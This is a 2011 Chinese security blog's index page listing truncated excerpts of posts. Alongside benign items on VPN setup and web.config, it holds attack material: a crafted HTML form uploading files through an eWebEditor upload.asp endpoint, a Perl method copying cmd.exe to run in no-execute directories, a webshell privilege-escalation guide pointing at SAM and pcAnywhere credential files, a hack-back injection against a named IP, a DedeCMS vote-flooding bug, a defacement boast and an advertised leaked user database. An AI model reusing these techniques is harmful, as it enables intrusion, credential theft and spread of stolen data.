手动构建htm代码直接传给upload

分类:安全 | 2011-12-30 | 撸过 415 次
0人扯谈

<form action="http://www.badguest.cn /ewebeditor/upload.asp?action=save&type=IMAGE&style=standard1" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type=hidden na[......]

继续阅读

使用Linux搭建VPN服务器

分类:技术 | 2011-12-30 | 撸过 483 次
0人扯谈

VPN服务器的配置与应用

实验场景 通过将Linux配置VPN服务器允许远程计算机能够访问内网

安装前准备:
1、检查服务器是否有必要的支持。如果检查结果没有这些支持的话,是不能安装pptp的。命令:

modprobe ppp-compress-18 && echo ok

这条执行执行后,显示“ok”则表明通过。不过接下来还需要做另一个检查,输入指令:

2。cat /dev/net/tun

  如果显示如下信息,说明通过,如果不支持,可以给vps商发ticket开通tun,大部分美国vps商都可以支持:

  cat: /dev/net/tun: File desc[......]

继续阅读

Web.config 安全相关配置

分类:技术 | 2011-12-30 | 撸过 1,077 次
0人扯谈

web.config 位于根目录

 

1、authentication节点

 

<system.web>

<!--配置ASP.NET 使用的安全身份验证模式,以标识传入的用户。-->

<authentication mode="Forms">

<forms loginUrl="~/User/Login.aspx" name=".ASPXAUTH" defaultUrl="User/Default.aspx" timeout="30" path="/"/>

</authentication>

&nb[......]

继续阅读

捅伊朗黑客PP -- 后台登陆POST+错误回显 注入

分类:安全 | 2011-12-30 | 撸过 491 次
0人扯谈

看了一个泰国政府的网站被伊朗的黑客挂页,上面写着
“Your Box 0wn3z By Behrooz_Ice - Q7x -Sha2ow -Virangar -Ali_Eagle -iman_taktaz - Satanic2000”
“We Love Iran”
“Ashiyane Digital Security Team”
这样的话云云。一些中国的傻逼还拿着别人的黑页去zone-h去提交,感觉受不了这么傻逼的事情,就跟着犯了傻逼,捅了人家的PP
下面我就讲讲怎么捅了他们的PP(http://203.154.183.18/ash_hack.htm)
作者:YoCo Smart
来自:Si[......]

继续阅读

dedecms 5.7 - 游客无限刷顶踩数值

分类:安全 | 2011-12-30 | 撸过 467 次
0人扯谈

只测试了DEDECMS V5.7系统,之前的版本估计也一样。

在官方地址进行的简单测试,应该算是一个小BUG,利用这个可以无限的刷某篇文章的顶/踩 数值。

详细说明:虽然前端页面做了 游客 只能提交一次的限制,但是直接以URL访问则没有限制,只要按着F5不放,一会就能上百上千。。。。

而且dede的官方也木有做这方面的限制。。。你懂的

漏洞证明:http://www.dedecms.com/plus/feedback.php?aid=1102&action=bad&fid=1102

http://www.dedecms.com/news/2011/1201/1102.[......]

继续阅读

让.net程序自动运行在管理员权限下

分类:技术 | 2011-12-30 | 撸过 360 次
0人扯谈

如何让.net程序自动运行在管理员权限下 VS2010 c# 编译的WINFORM程序 在Win7 以管理员身份运行

windows 7和vista提高的系统的安全性,同时需要明确指定“以管理员身份运行”才可赋予被运行软件比较高级的权限,比如访问注册表等。否则,当以普通身份运行的程序需要访问较高级的系统资源时,将会抛出异常。
  如何让程序在启动时,自动要求“管理员”权限了,我们只需要修改app.manifest文件中的配置项即可。
  app.manifest文件默认是不存在的,我们可以通过以下操作来自动添加该文件。
(1)进入项目属性页。
(2)选择“安全性”栏目。
(3)将“启用Cli[......]

继续阅读

利用PERL突破目录无执行权限

分类:安全 | 2011-12-30 | 撸过 395 次
0人扯谈

前几天和谐一个站,独立服务器,就一个站,想提权应该不难。后来发现是坑爹的星外啊。草了啥目录多没权限执行。

翻来翻去翻到个PERL目录,这东西玩的少。在百度搜到一篇吐司发的文章,利用方法拿了权限。文章如下:

目标可写目录无执行权限.装有PERL。有运行权限。但system,exec,“,这几个函数没有权限。

注意PERL并非系统权限。而是继承的nt authority\network service权限,所以默认比web权限略的高点。

 

利用perl的copy 函数
use File::Copy;
$a=’d:\web\cmd.exe’;
$ac=’c:/windows/Micros[......]

继续阅读

蒙牛公司官网被黑,SIT小组集体飘过!

分类:安全 | 2011-12-29 | 撸过 490 次
0人扯谈

蒙牛公司官网被黑截图

号称“最全的WEBSHELL提权大大全

分类:安全 | 2011-12-25 | 撸过 599 次
0人扯谈

第一,WEBSHELL 权限提升技巧
C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的 CIF 文件,破解得到 pcAnywhere
密码,登陆
c:\ProgramFiles\serv-u\
C:\WINNT\system32\config\
下它的 SAM,破解密码
c:\winnt\system32\inetsrv\data\
是 erveryone完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\perl
C:\Program[......]

继续阅读

密码保护:大站有爱:天涯数据遭拖库抓紧下载吧(加密码了)

分类:安全 | 2011-12-25 | 撸过 658 次
1人扯谈

这是一篇受密码保护的文章,您需要提供访问密码:

密码:

第 1 页,共 4 页1234